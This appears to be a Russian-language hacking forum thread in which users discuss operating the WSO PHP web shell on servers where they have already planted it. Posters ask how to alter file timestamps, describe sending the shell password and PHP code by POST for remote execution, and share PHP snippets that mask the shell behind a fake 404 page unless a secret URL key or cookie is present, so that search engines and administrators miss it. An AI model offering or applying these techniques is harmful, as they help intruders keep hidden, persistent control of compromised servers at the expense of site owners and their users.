подскажите, можно ли с помощью wso изменить дату редактирования файла? если нет, то каким другим способом можно?
Ребят, в можно юзать этот шел, в режиме выполнения get или post команд (с авторизацией)? если нет, то было б не плохо видеть в новой версии. пример: site.com/shell.php?p=pass&cmd=echo(111);
всё очень просто: шеллЫ уже залиты... ".. знал бы прикуп жил бы в сочи" (С) Теоретически я могу конечно обработать и текущий шелл: авторизироваться постом, и послать форме name="pf" пост со значением <textarea name=code....> - php команды... Но это получается, извините через попу... (
не могу понять твоей мысли: плюс чтоб потом не мучиться переправкой кода, можно добавить функцию обновления шелла с какого нить источника...
условие такое: шелл править нет возможности. ты не о том... разобрал уже: постом отправлям сперва (шеллу): pass=password потом: a=php&p1=echo(11); в рузультате echo(11); выполняется на стороне сервера. думаю, это будет полезно прикрутить к ману шелла.
Что тебе мешает написать небольшой скрипт, который будет логиниться в шелл и eval'ить твой код на стороне сервера? UPD: да что там даже логиниться - алгоритм генерации кукисов-то известен, пароль к шеллу ты сам задаешь.
Ещё было бы не плохо сделать при создании архива,указывать путь где сохранить. А то я например залил шелл,а заархивировать ничего не получается потому что в var/www/ каталоге права "Только чтение". А так бы можно было создать архив в каталоге var/tmp/
Насколько надежна филтрация поисковиков? Имеются в виду не только яндекс и гугл, но и совсем малоизвестные иностранные.
Относительно ненадежна. "Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler" Однако можешь зделать требование, когда будет открываться шелл, а при обычном GET он выдадет 404.
Если б еще написали как это сделать, было бы замечательно! Думаю многим бы пригодилась бы, данная модификация..
PHP: <?php if ($_GET['key'] == 'antichat') { // код шелла } else { echo " <HTML><HEAD> <TITLE>404 Not Found</TITLE> </HEAD><BODY> <H1>Not Found</H1> The requested URL was not found on this server. </BODY></HTML> "; } ?> Далее чтоб открыть шелл открывай по адресу /shell.php?key=antichat
О боже... Такое чудо ни от поисковиков не спасёт, а только админов привлечёт. Нужен код 404 в HTTP заголовках, если его нет, шелл проиндексируют в е зависимости от контента. А GET вызовет лишнее палево в логах. Лучше использовать что то подобное: PHP: //В начало кода if(!isset($_COOKIE['ts'])) { header('HTTP/1.0 404 Not Found'); exit; }